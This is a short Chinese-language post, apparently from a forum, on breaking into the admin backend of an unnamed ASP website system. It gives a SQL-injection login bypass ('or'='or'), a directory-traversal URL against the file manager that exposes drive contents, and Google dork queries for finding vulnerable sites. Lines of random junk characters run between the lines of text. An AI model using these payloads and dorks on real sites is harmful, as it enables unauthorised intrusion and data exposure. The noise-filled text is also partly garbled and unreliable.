后台万能密码 'or'='or'
6 @2 Y, @* D0 e" {/ w. |: |! n
& T; _7 e) i- g; w3 ?4 i后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
+ ?% b; b! H. J$ ^; ]5 F9 Dadmin/uploadfile.asp?currentFolder=/upfiles/../
r& i+ M* \9 W. B4 Y# r' T- k3 o* f9 F: m! Q' W- R% s7 v7 f7 P T; v
漏洞证明:
- V3 \8 u# t! A" a* Z1 R
+ y+ W1 ~; \4 D$ `+ E: J谷歌:inurl:type.asp?id=1 新闻中心' V' [; [; a Q- f' E
或者 :inurl:download_ok.asp?( C5 y! J. J5 J0 G) m" D: }! {9 Q
( j7 F& k# ?4 T8 ~3 M2 M
|